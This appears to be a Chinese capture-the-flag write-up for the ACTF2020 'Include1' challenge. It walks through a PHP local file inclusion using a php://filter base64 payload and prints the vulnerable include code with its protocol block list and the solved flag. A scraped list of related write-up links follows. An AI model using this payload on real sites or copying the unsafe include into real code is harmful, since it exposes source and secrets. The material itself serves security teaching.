[ACTF2020 新生赛]Include1

简介: [ACTF2020 新生赛]Include1

1.这是一道文件包含的题目

2.点开链接之后页面如下

3.我们想到这里会用到php伪协议,第一种就是先尝试php://input,发现被过滤了。

4.尝试第二种php://filter,发现页面有显示一串字符。

?file=php://filter/read=convert.base64-encode/resource=index.php

5.将字符串base64解码后得到一串代码。

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
  exit('hacker!');
}
if($file){
  include($file);
}else{
  echo 'tips';
}
?>

6.这段代码的意思是如果 GET 请求中包含了名为 file 的参数,则将该参数的值作为文件名,包含该文件;否则输出字符串 tips。如果 file 参数的包含了 php://input、zip://、phar:// 或 data: 等协议,则会输出字符串 hacker!

7.这时候我们用filter伪协议去读取flag.php文件。得到这一串代码

8.解码之后得到flag

flag{16f3e812-49f2-48b2-b700-a1bf20220f7c}
相关文章
|
4月前
|
数据安全/隐私保护
[SWPUCTF 2021 新生赛]简简单单的解密
[SWPUCTF 2021 新生赛]简简单单的解密
56 0
|
4月前
[SWPUCTF 2023 秋季新生赛]字节码
[SWPUCTF 2023 秋季新生赛]字节码
54 0
BUUCTF[ACTF2020 新生赛]Exec1
BUUCTF[ACTF2020 新生赛]Exec1
|
4月前
日更[ACTF新生赛2020]Oruga wp
日更[ACTF新生赛2020]Oruga wp
35 0
|
7月前
|
数据安全/隐私保护 Python
BUUCTF [ACTF新生赛2020]base64隐写 1
BUUCTF [ACTF新生赛2020]base64隐写 1
511 0
BUUCTF [ACTF新生赛2020]base64隐写 1
|
存储
[ACTF新生赛2020]SoulLike 题解
[ACTF新生赛2020]SoulLike 题解
150 0
|
7月前
|
PHP
BUUCTF---[ACTF2020 新生赛]BackupFile1
BUUCTF---[ACTF2020 新生赛]BackupFile1
|
PHP
[SWPUCTF 2021 新生赛]include
[SWPUCTF 2021 新生赛]include
211 0
|
7月前
|
数据安全/隐私保护
BUUCTF [ACTF新生赛2020]swp 1
BUUCTF [ACTF新生赛2020]swp 1
174 1
|
7月前
|
数据安全/隐私保护
BUUCTF [ACTF新生赛2020]outguess 1
BUUCTF [ACTF新生赛2020]outguess 1
144 0
BUUCTF [ACTF新生赛2020]outguess 1